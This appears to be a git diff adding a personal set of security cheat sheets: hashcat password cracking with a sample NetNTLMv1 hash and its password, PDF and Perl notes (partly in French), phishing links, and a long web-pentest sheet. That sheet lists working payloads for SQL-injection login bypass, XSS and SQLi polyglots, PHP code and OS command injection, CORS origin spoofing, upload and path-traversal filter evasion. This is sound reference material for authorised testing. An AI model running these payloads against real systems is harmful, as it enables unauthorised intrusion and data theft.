+# whitepixel
+http://whitepixel.zorinaq.com/
+
+# hashkill
+http://www.gat3way.eu/hashkill/index.php (buggy pour l'instant et pas gpu)
+
+# hashcat
+http://www.question-defense.com/2010/08/15/automated-password-cracking-use-oclhashcat-to-launch-a-fingerprint-attack
+http://www.question-defense.com/2010/11/24/oclhashcat-fingerprint-attack-video
+
+# oclHashcat
+status output means the following ??? p:progress, cs:current salt, cr:current rule, cl:current (plain) length, rt:runtime, s:speed.
+
+# keyboard walk
+http://hashcat.net/forum/thread-3614-post-20665.html
+
+# benchmarks
+https://gist.github.com/epixoip/63c2ad11baf7bbd57544
+https://gist.github.com/epixoip/abd64f1af800013abb1f
+http://hashcat.net/forum/thread-309.html
+http://golubev.com/gpuest.htm
+http://www.sch0.org/
+http://openwall.info/wiki/john/benchmarks
+https://en.bitcoin.it/wiki/Mining_hardware_comparison
+
+# halflm (aka. netlm, netntlmv1-vanilla) http://www.jedge.com/wordpress/2014/01/oclhashcat-halflm-netlm-and-bruteforcing-the-second-half/
+*ntlmv1.txt => KentN::CORP:76365E2D142B5612BE95F16C7AC2AD56862D775922AF71EB:996B94A8B3F0D0A60673AF178A4CBA0CAA535884D56A631F:1122334455667788 (Password21)
+hashcat -a 5 -t ~/tools/password/hashcat.net/hashcat/tables/toggle_case.table --stdout <(echo PASSWOR) > case.exp
+oclhashcat -a 6 -m 5500 ntlmv1.pw case.exp ?a?a?a?a
+or
+hashcat -a 3 -m 5500 ntlmv1.pw Passwor?a?a?a
+or with rainbow tables
+/pentest/tools/password/rcracki/rcracki_mt -t 6 -h 76365E2D142B5612 -o output.file /pentest/tables/rti/lm_chal/* # the first 16 hex chars is the LM hash (cat ntlmv1.pw|cut -d: -f4|cut -c1-16)
diff --git a/Cheat Sheet/pastebin b/Cheat Sheet/pastebin
new file mode 100644
index 0000000..84e1257
--- /dev/null
+++ b/Cheat Sheet/pastebin	
@@ -0,0 +1,10 @@
+# pastebin
+
+# Pastebin Archive hashes
+https://hashfind.net/
+
+# perl script to monitor pastebin
+https://github.com/xme/pastemon
+
+# python script to mine pastebin
+https://github.com/lbragues/pasteminer
diff --git a/Cheat Sheet/pca b/Cheat Sheet/pca
new file mode 100644
index 0000000..ca6cfbc
--- /dev/null
+++ b/Cheat Sheet/pca	
@@ -0,0 +1,7 @@
+# pca/pra bcp/drp
+
+pca: plan de continuité d'activité
+pra: plan de reprise d'activité
+
+bcp: business continuity planning
+drp: disaster recovery planning
diff --git a/Cheat Sheet/pdf b/Cheat Sheet/pdf
new file mode 100644
index 0000000..b278874
--- /dev/null
+++ b/Cheat Sheet/pdf	
@@ -0,0 +1,32 @@
+# pdf
+
+# basics
+https://gendignoux.com/blog/2016/10/04/pdf-basics.html
+
+# tools to analyze pdf
+PDF Dump Stream (http://sandsprite.com/blogs/index.php?uid=7&pid=57)
+
+# manipulate pdfs with python
+http://reachtim.com/articles/PDF-Manipulation.html
+
+# comprehensive analysis
+http://hiddenillusion.blogspot.com.au/2013/12/analyzepdf-bringing-dirt-up-to-surface.html
+
+# merge *.jpg into one .pdf with imagemagick
+convert *.jpg blah.pdf
+
+# merge *.pdf into one
+pdfunit 1.pdf 2.pdf n.pdf all.pdf
+
+# extract pdf in jpg images
+convert blah.pdf %d.jpg
+
+# rotate 90degrees
+mogrify -rotate 90 0.jpg # modify in place
+
+# extract pages from pdf
+gs -sDEVICE=pdfwrite -dNOPAUSE -dBATCH -dSAFER -dFirstPage=22 -dLastPage=36 -sOutputFile=outfile_p22-p36.pdf monpdf.pdf
+
+# Learning the PDF basics, applying it to hide/reveal informations in documents
+http://media.ccc.de/browse/conferences/mrmcd/mrmcd14/MRMCD2014_-_6007_-_en_-_grossbaustelle_ber_-_201409051830_-_pdf_101_pdf_secrets_-_ange_albertini.html
+by one of the guys behind POC||GTFO (https://www.alchemistowl.org/pocorgtfo/)
diff --git a/Cheat Sheet/pentest b/Cheat Sheet/pentest
new file mode 100644
index 0000000..2266a69
--- /dev/null
+++ b/Cheat Sheet/pentest	
@@ -0,0 +1,302 @@
+# pentest
+
+http://code.google.com/p/pentest-bookmarks/wiki/BookmarksList
+https://github.com/dloss/python-pentest-tools
+
+# checklist
+http://www.owasp.org/index.php/Testing_Checklist
+http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html
+http://www.pentest-standard.org
+
+# tools / learn
+http://blackarch.org/tools.html
+http://www.win.tue.nl/~aeb/linux/hh/hh.html
+https://www.owasp.org/index.php/Phoenix/Tools
+http://oss-security.openwall.org/wiki/tools
+http://securitytools.wikidot.com/penetration-vulnerability-ids-ips
+
+# search for known exploits
+locate -i
+~/Documents/kb/
+~/Documents/exploits/{exploit-database,packetstorm,vulndbs}
+
+site:seclists.org KEYWORD <- many lists
+site:http://lists.grok.org.uk KEYWORD <- full disclosure only
+site:cvedetails
+
+www.intelligentexploit.com ...
+metasploit modules, nmap nse
+grep keyword blackarch,pentoo,kali,...
+learn about technology, test on a local install
+admin interfaces: https://www.whitehatsec.com/bAdmin/bAdmin.html
+
+# reporting
+http://www.securingthehuman.org/developer/swat
+
+# testing
+* type cast issues
+blah?a=1&a[]=1
+blah?x[y]=1&x[y]z=2
+blah.php?foo=bar =? blah.php?foo[]=bar (if equals maybe app casts the values of the array into a string)
+
+* source code leak
+http://a.com/index.jsp::$DATA or .JSP or .jsp. or jsp%20
+http://a.com/myapp/%252e%252e/manager/html mod_jk
+http://a.com/index.jsp%01 (http://secalert.net/#scl-soh)
+http://a.com/index.js%70 (WebLogic http://www.securityfocus.com/bid/2527/exploit)
+http://a.com/examples/snp/snoop%252ejsp (Tomcat http://www.securityfocus.com/bid/2527/exploit)
+http://a.com/login.JsP (IBM Websphere http://www.securityfocus.com/bid/1328/info)
+http://a.com/login.jsp%20 (Netscape Web Server http://www.securityfocus.com/bid/273/discuss)
+http://a.com/%3f.jsp (Allaire JRun Root http://www.securityfocus.com/bid/3592/discuss)
+http://a.com///[1-4096 slashes here]/admin/* (Apache long slash path directory listing http://www.securityfocus.com/bid/2503/discuss)
+http://a.com/%5cadmin/ (BEA WebLogic Directory Traversal with %00, %2e, %2f and %5c via:http://www.securityfocus.com/bid/2513/discuss)
+
+* cgi
+shellshock
+/cgi-bin/test-cgi?/* and /cgi-bin/test-cgi?* https://teamrocketist.github.io/2017/09/15/Web-SECTF-Sprinkler-system/ http://insecure.org/sploits/test-cgi.server_protocol.html
+
+* polyglot (http://www.slideshare.net/MathiasKarlsson2/polyglot-payloads-in-practice-by-avlidienbrunn-at-hackpra)
+mysql: +or+SLEEP(10)/*'or+SLEEP(10)+or'"or+SLEEP(10)+or"*/ urlencoded: %20or%20sleep%2810%29/%2a%27or%20sleep%2810%29%20or%27%22or%20sleep%2810%29%20or%22%2a/
+xss: " onclick=alert(1)//<button value=Click_Me ' onclick=alert(1)//> */ alert(1); /* 
+aio: /*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or' /*! or SLEEP(1) or /*/, onclick=alert(1)//> /*/*/'or" /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*"/** /*!/*/ // /*/*/
+more at https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
+using BENCHMARK instead of SLEEP: https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/
+more xss polyglot https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
+
+* xss
+leverage error pages/sqli errors/... (send encoded xss, response returns error page with decoded payload)
+utf-7
+
+* cors
+send Origin: https://evil.net (many servers dynamically generate Access-Control-Allow-Origin: based on user-supplied Origin:)
+send Origin: https://evillegit.com if site only trusts legit.com
+send Origin: https://legit.com.evil.net if site only trusts https://legit.com
+send Origin: null (exploit: obtain the null origin using a sandboxed iframe <iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script>cors stuff here</script>’></iframe>)
+failing to configure an origin whitelist in certain applications may result in Access-Control-Allow-Origin: null
+send Origin: http://evil.com (can mitm if app only trusts Origin: https://legit.com)
+
+* sqli
+?id=!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~  // id=%21%22%23%24%25%26%27%28%29%2A%2B%2C-.%2F%3A%3B%3C%3D%3E%3F%40%5B%5C%5D%5E_%60%7B%7C%7D%7E
+' '' " "" \ \\ \' \" ... ) -- )--
+%2527 %2522 ... %252527 ...
+?login=%bf%27 # bypass mysql-real-escape-string (db driver and db don't talk same charset)
+send even and odd numbers of ' (filter doubles up single quotes but truncates input to N chars)
+stacked, time-based, second order
+rtfm keywords/escaping
+select 1 from users where login = "login" and password = "password" => 1 # sqlite
+select * from users where username = 'a'+'b' and password = 'a'+'b' => returns first user whose username and password doesn't start with a numeric value (mysql:  http://vagosec.org/2013/04/mysql-implicit-type-conversion/ and other operators possible) # sqli waf evasion
+select * from users where username = 0 => returns all records because column is of type varchar (every username is converted into a double, and 0=0 is true)
+select 'foo'+0 = 0 => 1 (true) 
+select 'a'+'666' => 666 (double value)
+
+login=user1&password=') or 1=1 limit 0,1 --%20 # bypass auth
+query: "SELECT * FROM haxorz_memberz WHERE login = '%s' AND password = MD5('%s')"
+code: if (@mysql_num_rows($sql) == 1)
+
+* sqli in order by (MySQL)
+?order=book_id+DESC
+?order=book_id`,`book_name
+?order=IF(1,book_id,book_name)
+
+* parameters to test
+GET, POST, Cookie, User-Agent, Host, Referer, X-Forwarded-For, X-Forwarded-Host, Origin, Accept-Language ...
+
+X-Forwarded-For: 127.0.0.1
+X-Forwarded-For: 175.45.177.64 (the hostname's IP or the interface IP etc.)
+
+Proxy: 127.0.0.1:1 (https://httpoxy.org)
+
+* bypass IP whitelisting
+X-Forwarded-For: 0000::1 (RoR 4.2 Web Console https://gist.github.com/joernchen/d868521352f1ccd25095)
+
+* authentication
+incomplete validation: remove last character of long password, change case, remove specials
+password hash collision / php operator ==
+register Admin to login as admin # MySQL performs a case insensitive comparison by default
+register admin%20 to login as admin # MySQL ignores trailing spaces when performing string comparison
+register admin++++...++++x column truncation (http://www.notsosecure.com/blog/2008/09/11/sql-column-truncation-vulnerabilities/ http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/ http://www.sektioneins.com/en/advisories/advisory-052008-wordpress-user_login-column-sql-truncation-vulnerability.html)
+register admin+lulz@company.com, register "admin"
+/activate/?activation_code= => SELECT * FROM users WHERE (users.`activation_code` IS NULL) LIMIT 1 # login w/o password as the first account
+/login?username[]=admin&password=
+/login?username=admin&password[]=a // strcmp($expectedpw, $_GET['password') == 0
+
+* race conditions
+register account with multiple emails, use a coupon multiple times etc.
+
+* authentication bypass
+cookie: $username|$expiry|$hmac => hmac_md5(admin1|1353464343, $key) == hmac(admin|11353464343, $key) (wordpress) or bf $key (rack)
+type juggling in php or other (http://www.php.net/manual/en/language.types.type-juggling.php) var_dump('1abcdef' == 1); => true. Or stuff like strcmp, ==, equals ... (http://turbochaos.blogspot.com.au/2013/08/exploiting-exotic-bugs-php-type-juggling.html)
+var_dump("0e1234" == "0e4321"); => true (0 multiplied by anything is still 0) useful if server does: if (hmac(..) == hmac(..))
+try with empty password (ldap unauthenticated authentication)
+
+* authentication bypass (session puzzling)
+hit the forgotpw page with the admin login to get an authenticated admin cookie (SEPM CVE-2015-1486)
+hit the register page with the admin login while authenticated as a lambda user to change session (seam, mellivora)
+
+* authentication bypass (mass assignment / autobinding)
+https://www.owasp.org/index.php/Mass_Assignment_Cheat_Sheet
+
+* reset forgot pw
+mysql 1="1abc" => true and 0="abc" => true so request /reset?token=0 (http://phrack.org/issues/69/12.html)
+opencfp reset token is NULL in db by default so request ?reset_token=%00 (opencfp bug http://haxx.ml/post/149975211631/how-i-hacked-your-cfp-and-probably-some-other)
+send more than one reset password request at the same time, or http pipeline multiple requests (dont update content-length or send Connection: close)
+php integer key truncation (send id of 4294967296)
+
+* captcha
+remove captcha_answer= parameter from request
+leaked in src or cookie
+re-submit same answer w/ same cookie
+limited number of words (solve with a hash lookup table)
+tesseract-ocr ou gocr ou ssocr
+remove blue grid from image : Image('captcha.png').point(lambda p: p>0 and 255).save('clean.png') # blank everything that's not black
+un-implode
+SentryMBA
+
+* server side include
+<!--#printenv -->
+
+* server side template injection (ssti)
+http://blog.portswigger.net/2015/08/server-side-template-injection.html
+http://blog.orange.tw/2016/04/bug-bounty-uber-ubercom-remote-code_7.html
+https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
+{{7*7}}
+
+* expression language injection
+${777-111} #{777-111} %{777-111}
+see ./java
+
+* code injection
+search.php?q={${phpinfo()}} // http://secalert.net/#ebay-rce-ccs
+try echo pi in case input is eval'd by PHP app
+in PHP usort: ?order=id);}system('uname%20-a');//
+in PHP assert: ?vuln=hacker'.phpinfo().' -> assert('hacker'.phpinfo().'
+
+* OS command injection
+try commands that don't return any output or only return one word: sleep/ping/pwd/whoami
+or get output through out-of-band
+or ip=127.0.0.1%0a`id`>/var/www/public/results.txt
+
+* xml, xpath, ldap injection
+see ./twahh
+
+* SMTP
+%0aCc:
+%0d%0aBcc:
+%0aDATA%0afoo%0a%2e%0aMAIL+FROM:...
+
+* upload
+change extension to .php[3-7], .phtml, .pht, .php.xyz, .xhtml, .shtml, .stm. .shtm, ..., .html, .htm, .htt, .mht, .thtml, .svg, .xml
+upload lol.php.csv
+upload .htaccess to enable another allowed extension to be run by PHP
+upload evil.php with Content-Type: image/jpg in case app checks the MIME type
+upload evil.jpg with PHP code inside image
+upload evil.png acess uploads/evil.png/x.php (see ./nginx)
+upload imagetragick (im relies on the magic header so even if app checks extension you can upload a .mvg or .svg file as evil.png)
+
+* passive scanning
+parse image responses for sql errors, path/ip disclosures etc.
+
+* path traversal / LFI
+try ../ then ../../ then ../../../ (can get an error on first 2 but success on 3rd)
+....// (evasion, more below)
+
+* randomness
+crack seed https://github.com/altf4/untwister
+
+* iis
+http://srv/web/blah\..\jobMail.asp
+
+* inter-protocol exploitation
+e.g. server does not sanitize dns response from attacker's domain => xss, sqli, rce ...
+
+* heartbleed
+ESX & ESXi are vuln
+
+* dos
+hashtable collisions (http://www.phpinternalsbook.com/hashtables/hash_algorithm.html)
+php CVE-2018-5711 + gif upload
+
+# filter evasion
+always be aware that filters and weird setups can alter your inputs,
+cap strings, add stuff to them, replace/remove characters and so on.
+windows: change case, use 8.3 file/dir names, insert unsupported chars (<, : etc.) that will be automatically removed
+
+SeLeCt
+selselectect
+%53%45%4c%45%43%54
+%2553%2545%254c%2545%2543%2554
+....//
+etc.
+
+$id = str_replace(' ', '', $id);
+if (!preg_match('/^\d+$/m', $id)) { die(); }
+$id = preg_replace('/^[^\d]+$/', '', $id); // won't replace "a1"
+=> bypass all 3 filters with "1%0A)or(1)%23"
+expl: "0%0a)union/**/select/**/null"
+
+* whitespace
+%09 %0d %0a %20 ...
+add more than one of each type
+
+* url encoding
+s%65lect
+s%2565lect
+s%elect
+
+* multiline regex
+id=123\nPAYLOAD
+
+* comments
+SELECT/*foo*/username,password/*foo*/FROM/*foo*/users
+SEL/*foo*/ECT username,password FR/*foo*/OM users // mysql only
+
+* string concatenation
+MySQL: concat('adm','in')
+Oracle: 'adm'||'in'
+MS-SQL: 'adm'+'in'
+
+exec('sel' + 'ect * fro' + 'm users')
+
+* bypass path filter
+///index.php <- php parse_url() bypass
+/;/index
+
+* alternate IP encoding (https://prezi.com/fffqa6n75gbm/zeronights-2014-hunting-for-top-bounties/)
+127.0.0.1
+2130706433
+0x7f000001
+0x7f.0x0.0x0.0x1
+0177.0000.0000.0001
+ping 010.010.010.010; ping 127.1; ping 0177.1; ping 0x7f.1; ping 0; man inet_aton (You can use/mix decimal/octal/hex, omit some/most octets)
+
+http://425.510.425.510/ dotted decimal with overflow
+http://2852039166/ dotless decimal
+http://7147006462/ dotless decimal with overflow
+http://0xA9.0XFE.0XA9.0XFE/ dotted hexadecimal
+http://0xA9FEA9FE/ dotless hexadecimal
+http://0x41414141A9FEA9FE/ dotless hexadecimal with overflow
+more in Server Side Browsing by @agarri
+
+* utf-7
+def utf7(s): # Illegal but accepted UTF7, useful for some blacklists
+  return ''.join('+%s-' % b64encode('\x00' + c).rstrip('=') for c in s)
+
+* utf-16
+U-FF2e http://graphemica.com/%ef%bc%ae get(u'u\uff2e./flag.txt') (in case "ＮＮ" is blacklisted)
+U-012f http://graphemica.com/%c4%ae http://www.fileformat.info/info/unicode/char/012e/index.htm get(u'\u012e\u012e/flag.txt') (in case "Ｎ" is blacklisted)
+
+* path traversal
+           URL-encoding | 16-bit unicode-encoding | double URL-encoding | overlong UTF-8 unicode-encoding
+dot            %2e      | %u002e                  | %252e               | %c0%2e  %e0%40%ae  %c0ae  etc.
+forward slash  %2f      | %u2215                  | %252f               | %c0%af  %e0%80%af  %c0%2f etc.
+backslash      %5c      | %u2216                  | %255c               | %c0%5c  %c0%80%5c  etc.
+null byte      %00                                                      | %c0%80
+
+hex(0x80 + ord('/')) -> %c0%af
+
+' = %27 = %c0%a7 = %e0%80%a7 = %f0%80%80%a7
+" = %22 = %c0%a2 = %e0%80%a2 = %f0%80%80%a2
+< = %3c = %c0%bc = %e0%80%bc = %f0%80%80%bc
+; = %3b = %c0%bb = %e0%80%bb = %f0%80%80%bb
+& = %26 = %c0%a6 = %e0%80%a6 = %f0%80%80%a6
+\0= %00 = %c0%80 = %e0%80%80 = %f0%80%80%80
diff --git a/Cheat Sheet/perl b/Cheat Sheet/perl
new file mode 100644
index 0000000..03f0d16
--- /dev/null
+++ b/Cheat Sheet/perl	
@@ -0,0 +1,362 @@
+# perl
+
+http://sylvain.lhullier.org/publications/perl.html
+
+perl -e  "print '0'x64"
+perl -ne 'chop;@a=split(/;/);print(($a[0]?$a[0]:$a[1]).":".$a[2].":0:0:".$a[3]."::\n");'
+find -type f | xargs cat | perl -ne 'print join("\n", (m|https?://[\w./?&=]+|iog))."\n"'
+
+# doc
+perldoc perlre
+faq.perl.org
+
+# toujours executer avec -w pour avoir les warnings et rendre le langage moins permissif
+#!/usr/bin/perl -w
+use strict; # module ayant pour rôle de rendre la syntaxe Perl plus coercitive (modules pragmatiques: strict, diagnostics, etc)
+
+# contexte
+2 contextes principaux: scalaire et liste
+
+plusieurs contextes scalaire:
+- numérique (addition)
+- chaines de caractères
+- tolérant (ni chaine ni numerique, simplement scalaire)
+
+contexte vide
+"Bonjour"; => on aura un warning
+
+# chaines de caractères: caractères speciaux à protéger avec \
+- entre ":
+$ @ \ "
+- entre ':
+' \
+
+# valeur undef: valeur par defaut d'une variable scalaire non initialisée:
+my $x;
+my $x=undef;
+undef($x);
+=> écrire if(defined($x)) et NON: if ($x!=undef)
+
+# la division avec / est une division réelle: 2/3 => 0.666...
+int($x/$y) # fait une division entiere
+
+length()
+chop($x) supprime et renvoie son dernier caratère 
+chomp($x) supprime son dernier caractère si c une fin de ligne
+reverse(), index(), rindex()
+
+substr($v,5,1) = "ation à ";
+$v => "salutation à toi"
+
+# pas de booleens, valeurs scalaires fausses sont:
+- 0
+- "0" ou 'O'
+- "" ou ''
+- undef
+
+égalité		==	eq
+différence	!=	ne
+infériorité	<	lt
+supériorité	>	gt
+inf ou égal	<=	le
+sup ou égal	>=	ge
+comparaison	<=>	cmp
+# cmp => comparaison selon la table ASCII
+
+# toujours entourer les if par des accolades
+
+# print "\$s undefined\n" unless (defined($s)) equivalent à if (!defined($s))
+
+# for, while, until
+last, next, redo
+
+# listes 
+(2,'age',"Bonjour $prenom")
+() # liste vide
+(1..10, "${insect}man", 'a'..'z', $debut..$fin)
+@t = ("nom",12);
+(1,2,@t,"aaa",-1) <=> (1,2,("nom",12),"aaa",-1) <=> (1,2,"nom",12,"aaa",-1) # applatissement ou linéarisation
+(2,10) x 3 => (2,10,2,10,2,10)
+($a,@t) = @s; # $a reçoit le 1er element, et @t absorbe tous les autres
+($a,@t,@u,$b) = @s; # idem sauf que @u = () et $b = undef
+
+# tableaux
+my @t = (2,'age',"Bonjour $prenom")
+$t[-1] = "Salut $pseudo"; # modif du dernier element, -2 pour l'avant dernier, etc
+$t[$#t] # idem car $#t est l'indice du dernier element
+$t[3] = 4; # ajout d'un 4e element
+scalar(@t) # retourne le nombre d'éléments
+$x = @t;  # idem $x contient la taille du tableau
+if (exists( $t[100])) # vaut faux si ya pas d'element à cet indice
+if (defined($t[100])) # vaut faux si l'element existe et vaut undef ou l'element n'existe pas
+$t[10] = "blah"; # tous les elements entre valent undef et scalar(@t) vaut 11
+
+@ARGV # ne contient que les arguments
+$0    # contient le nom du programme
+
+@t = @s; # copie de tableau, @t perd ses anciennes valeurs meme s'il était plus grand que @s
+($a,$b) = (1,2,3); => (1,2)
+($a,$b) = (1); => (1,undef)
+($a,$b) = ($b,$a);
+
+my ($a,$b); # declarer plusieurs variables comme en C avec: int a,b;
+
+foreach my $v (@t) { ... }
+foreach (@t) { print "$_\n"; }
+
+unshift(@t,5,6); # ajout en debut de tableau
+$v = shift(@t);  # supprime et renvoie le 1er element
+push(@t,5,6); # ajout en fin de tableau
+$v = pop(@t); # supprimer et renvoie le dernier element
+@s = reverse(@t);
+
+@t = qw(un deux trois); # ou qw/un deux trois/;
+
+my ($arg1,$arg2) = @_; # 1ere ligne dans une fonction: recuperation des arguments 
+my $x = shift; # dans une fonction, ça agit sur @_ par defaut
+return ($ret1,$ret2); # une fonction peut retourner une liste
+
+$s = join(", ", 1,2,3); # $s = "1, 2, 3";
+@t = split(/, /,"1, 2, 3"); # @t = (1,2,3);
+@t = (1,2,3); @s = split(/, /, join(", ",@t)); # @s = @t;
+
+@s = sort( {$a <=> $b or $a cmp $b} @t ); # '8 navets' < '12 carottes' < '12 navets'
+
+@s = grep { $_<0 } $x,@t; # @s reçoit les éléments négatifs
+@s = grep { mafonction($_ } @t;
+# NB. la liste sera modifiée si j'affecte une valeur à $_
+
+@s = map( {-$_ } @t); # reçoit les opposés
+map( { $_*=2 } @t); # tous les éléments de @t sont multipliés par 2
+# NB. la valeur de la dernière expression du bloc sera placée ans la liste résultat
+
+
+#
+# expressions rationnelles (pattern matching: correspondance de motif)
+# 
+\ | ( ) [ ] { } ^ $ * + ? . # caractères spéciaux despécifier avec \
+
+# . matche tout sauf \n
+# matcher deux occurences d'un mot
+m/(\w+).*\1/
+
+# regroupement non mémorisant
+(?:motif)
+
+# en contexte scalaire m// retourne vrai ou faux
+if( $w =~ m/motif/ ) # on parle de correspondance
+
+# en contexte de liste m// retourne une liste 
+if( ($x,$y) = ($v =~ m/^(foo).*(bar)$/) ) # on parle d'extraction
+
+# separateur
+la plupart des caractères sont utilisables, la lettre m n'est pas obligatoire si le séparateur est /
+
+# en correspondance, option g permet de poursuivre la recherche en partant du dernier motif trouvé
+my $v = "aatobbtbvvtczz";
+while ($v =~ m/t./g) { print "$&\n"; } => to tb tc
+
+# option e
+$s =~ s/(\d+)/fonction($1)/e;
+$s =~ s/0x[0-9a-f]+)/hex($1)/gei;
+
+# par defaut
+$s = "mot\nlu";
+$s =~ m/mot$/ est faux
+# options s (singleline)
+$s =~ m/mot$/s est faux
+$s =~ m/t.lu$/s est vrai
+# option m (multiline)
+$s =~ m/mot$/m est vrai
+$s =~ m/t.lu$/m est faux
+
+# quantificateurs non-groumands: ajouter ?
+@l = ($m =~ m/'.*?'/g) # retourne tous les mots entre ''
+
+# reference arriere
+m/(.*) (?:et )+(.*) avec \1 \2/ # references arrieres qui matchera 'ab et bc avec ab bc'
+
+# variables speciales
+$& # vaut toute la sous-chaîne matchant,
+$` # vaut toute la sous-chaîne qui précède la sous-chaîne matchant,
+$' # vaut toute la sous-chaîne qui suit la sous-chaîne matchant. 
+
+
+# pour placer une variable utilisateur dans un motif ou un remplacement, il FAUT utiliser quotemeta()
+
+# tr
+$s = "azerty";
+$s =~ tr/abcde/01234/;
+print "$s\n";  # affiche 0z4rty
+
+
+#
+# fichiers
+#
+perldoc -f -X # operateurs
+if( -f $file && -w $file ) { ... }
+my $file_size = -s $file_path;
+
+@l = glob ('/usr/include/*.h'); 
+foreach my $name ( <.*>, <*> ) {
+	next if (! -d $name); print "$name : ". (-s $name) ."\n"; 
+}
+
+open(FIC, ">>data.txt") or die("open: $!"); # toujours tester si l'ouverture a reussi
+while (<FIC>) { print "$. : $_"; } # numerote chaque ligne du fichier
+
+while( defined( $line = <FILE> ) )
+printf( FIC "%03d", $i ); # pas de virgule apres le descripteur
+close( FIC );
+
+$l = <FIC>; # en contexte scalaire, renvoie la prochaine ligne disponible
+@t = <FIC>; # en contexte de liste, renvoie la liste des toutes les lignes restantes 
+
+# descripteurs ouverts au lancement du pg:
+STDIN, STDOUT, STDERR, ARGV 
+<ARGV> ou <> # les lignes lues sont celles des fichiers de la ligne de commande
+$ARGV contient le nom du fichier en cours de lecture
+
+$c = getc(FIC);
+$tailleLue = read(FIC, $tampon, $taillALire); # données placées dans $tampon
+sysopen, sysread, syswrite et close # bas niveau
+
+open(FIC1,"ls $ref |");    # FIC1 contient ce qu'a affiché la commande
+open(FIC2,"|mail robert"); # FIC2 contient le mail
+
+# fichiers DBM
+my %h;
+dbmopen(%h,"data",0644) or die($!);
+$h{'prenom'} = 'Larry';
+dbmclose(%h) or die($!);
+
+my %h;
+dbmopen(%h,"data",0644) or die($!);
+print "$h{'prenom'}\n";
+dbmclose(%h) or die($!);
+
+#
+# tables de hachage
+#
+my %h = ();
+my %h = ( "Paul"     => "01.23.45.67.89",
+          "Virginie" => "06.06.06.06.06",
+	  "Pierre"   => "heu ..." );
+
+sub f { return "Jac"; }
+$h{f().'ques'} = "02.02.02.02.02";
+
+foreach my $k (keys(%h)) { print "Clef=$k Valeur=$h{$k}\n"; }
+foreach my $v (values(%h)) {...}
+while( my ($k,$v) = each(%h) ) {...}
+
+delete( $h{hello} ) if (exists($h{hello})); # attention $h{hello} = undef; ne supprime pas la clef
+
+if( %h eq 0 ) { print "%h est vide\n"; }
+
+$h{hello} .= "après";
+$h{bye}++; # crée un élément de valeur 1 si la table ne comportait pas de clef bye
+
+my @t = ("Paul", "01.23.45.67.89", "Virginie", "06.06.06.06.06", "Pierre", "heu ...");
+my %h = @t;
+# et retour à la case départ avec: my @t2 = %h;
+
+foreach my $x (%h) { print "$x\n"; } # affiche la table comme une liste
+%h = reverse(%h); # les valeurs deviennent les clefs
+
+%ENV # variable contenenant l'env
+
+$h{"$i:$j:$k"} = Calcul($i,$j,$k); # table de hash permettent d'avoir des tableaux à plusieurs dimensions
+
+
+# 
+# tranches
+#
+@t[4,10] = (4321,"age"); # equivaut à: ($t[4],$t[10]) = (4321,"age");
+
+($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size,$atime,$mtime,$ctime,$blksize,$blocks) = stat($filename);
+($mtime,$ctime) = ( stat($filename) )[9,10];
+
+@h{'clef1','clef2'} # equivaut à: ($h{'clef1'},$h{'clef2'})
+
+# liste de valeurs uniques à partir d'un tableau dont on n'est pas sûr que ses valeurs soient uniques:
+my @t = qw(hello toto hello vous);
+my %h;
+@h{@t} = ();
+@t = keys %h;
+
+
+#
+# modules
+#
+$ perl -V # @INC: liste des répertoires où seront recherchés les modules.
+perldoc File::Copy
+perl -e 'use Net::SMTP' # verifier qu'un module est dispo sur le système
+
+#
+# references
+# 
+
+# sur scalaire
+$v = -43.5;
+my $refv  = \$v; # \$v est la référence de la variable $v
+print "$refv\n";   # affiche SCALAR(0x80ff4f0)
+print "$$refv\n";  # affiche -43.5
+$$refv = 56; 
+print "$v\n";      # affiche 56
+
+# sur fonction
+f( \$v );
+sub f
+{
+   my ($ref) = @_;
+   $$ref = 0;
+}
+# et
+my $reff = f2();
+sub f2
+{
+   my $w = 43;
+    return \$w;
+}
+
+# sur tableau
+my @t = (23, "ab", -54.4);
+my $reft  = \@t;
+my @t2 = @$reft;
+@$reft = (654.7, -9, "bonjour");
+$reft->[1] = "coucou"; # plus lisible que $$reft[1]
+my @t = ( 6, \@t1, \@t2, "s" ); # tableau de tableau, puis $t[2][1] ou avec une reference $r->[2]->[1]
+
+# sur table de hachage
+my $refh = \%h;
+my %h2 = %$refh;
+$refh->{Jacques} = 33;
+
+# sur fichiers
+my $refo = \*STDOUT;
+
+# sur fonctions
+my $ref = \&affcoucou;
+&$ref("Larry"); ou $ref->("Larry");
+
+# ajouter 1 à une reference ne vas pas faire pointer sur l'element d'indice +1 mais faire perdre le caractere reference à la variable
+
+# reference anonyme
+my $ref2 = \"er"; # mais $$ref2 = "blah"; lèvera une erreur
+my $r = [ 34.4, "ac", -71 ]; # vers tableau
+my $r = { 'Paul' => 21, 'Julie' => "e" };
+
+# operateur ref() permet de connaitre le type d'une reference
+# afficher la structure d'une variable
+use Data::Dumper;
+print Dumper($r);
+
+# reference circulaire
+c'est possible, mais attention le garbage-collector ne liberera pas la memoire si on ne casse pas la circularité:
+$r->[1] = undef;
+$r = undef;
+
+# cpan
+Config.pm: 'makepl_arg' => q[PREFIX=~/perl5lib/ LIB=~/perl5lib/lib INSTALLMAN1DIR=~/perl5lib/man1 INSTALLMAN3DIR=~/perl5lib/man3], # definir le repertoire dans lequel les modules seront installés
+export PERL5LIB=~/perl5lib/lib # ajoute le repertoire à mon @INC au runtime
diff --git a/Cheat Sheet/phishing b/Cheat Sheet/phishing
new file mode 100644
index 0000000..ce9cbae
--- /dev/null
+++ b/Cheat Sheet/phishing	
@@ -0,0 +1,5 @@
+# phishing
+
+https://github.com/trailofbits/trailofphish
+http://d.uijn.nl/?p=116 # powershell unicorn
+http://papercut.codeplex.com/ # fake smtp server
diff --git a/Cheat Sheet/php b/Cheat Sheet/php
new file mode 100644
index 0000000..feebbbb
--- /dev/null
+++ b/Cheat Sheet/php	
@@ -0,0 +1,210 @@
+# php
+
+# badass past vulns
